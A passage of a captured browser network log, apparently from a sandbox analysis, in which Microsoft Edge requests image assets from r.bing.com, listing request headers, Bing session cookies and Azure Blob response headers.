cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:05:25 GMT
etag: 0x8DCDC5EE1BFCC0A
content-length: 282
content-type: image/svg+xml
content-md5: 44eVtjQVTsH/Qca82lTuUg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e9a57e31-701e-001e-2a97-15307d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=164915
expires: Fri, 06 Dec 2024 07:56:50 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c9582
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Fsa_OI0AplCnVoXGca8ALOo0S0s.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 1101
content-type: image/svg+xml
content-md5: kc0Rz8ymXPrOlhUyaNcfYw==
last-modified: Fri, 12 Aug 2022 20:45:00 GMT
etag: 0x8DA7CA3867FC831
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: adc41e54-901e-0086-2e09-15d69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.097b1060.1686747743.2aab8902
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.097b1060.1686747764.2aac12e8
akamai-grn: 0.2a7b1060.1687568922.2d70b24a
akamai-grn: 0.3d7b1060.1689052474.2206a8cd
akamai-grn: 0.21aedd58.1689771282.bd10a3b
cache-control: public, no-transform, max-age=9604268
expires: Tue, 25 Mar 2025 13:59:23 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c9581
timing-allow-origin: *
GET

https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

content-length: 964
content-type: image/svg+xml
content-md5: iOPtPdfu4TP3P/udNrBLbw==
last-modified: Mon, 15 Aug 2022 20:49:31 GMT
etag: 0x8DA7EFFA703EB5F
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b8d4fb37-c01e-008b-0cf0-081e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.0a7b1060.1686747743.231c1613
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.157b1060.1686747764.1d5c2bc1
akamai-grn: 0.1b7b1060.1687776384.1457d6ce
cache-control: public, no-transform, max-age=11940158
expires: Mon, 21 Apr 2025 14:50:53 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c959b
timing-allow-origin: *
GET

https://r.bing.com/rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/kiGH9ukZK6Q4hvtDtwwVc1yvueg.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:54:04 GMT
etag: 0x8DCDC5D4C424AE8
content-length: 5387
content-type: image/jpeg
content-md5: adFid0+JT/i5IDMON2t6Yg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8f55db75-401e-0016-1dc2-172b0e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=333780
expires: Sun, 08 Dec 2024 06:51:15 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95a3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/KC_nX2_tPPyFvVw1RK20Yu1FyDk.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:54:00 GMT
etag: 0x8DCDC65AB4005D8
content-length: 1391
content-type: image/svg+xml
content-md5: YgWAZX6KRbSnuEULjaXNMg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5749eeb9-001e-001a-67d2-15c5ff000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=165468
expires: Fri, 06 Dec 2024 08:06:03 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c959f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Mon, 15 Aug 2022 17:39:27 GMT
etag: 0x8DA7EE519EF54EF
akamai-grn: 0.19fd4817.1699775190.19e2dda6
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 726
content-type: image/svg+xml
content-md5: ZgHkolq4RyA+EBWzJRSxbA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d46b8e76-f01e-0020-517e-0a9bf6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.1efd4817.1701123842.3b4e7f5b
cache-control: public, no-transform, max-age=7867180
expires: Wed, 05 Mar 2025 11:27:55 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95a0
timing-allow-origin: *
GET

https://r.bing.com/rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/hx-eea1zqtCz4K0bW2uH_oN7Fs4.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:16 GMT
etag: 0x8DCDC6089E98574
content-length: 1111
content-type: image/svg+xml
content-md5: wEyINKyRgCGG5s5neuSonQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 501de458-801e-0044-29ad-1936fc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=162976
expires: Fri, 06 Dec 2024 07:24:31 GMT
date: Wed, 04 Dec 2024 10:08:15 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306895.b0c95a1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
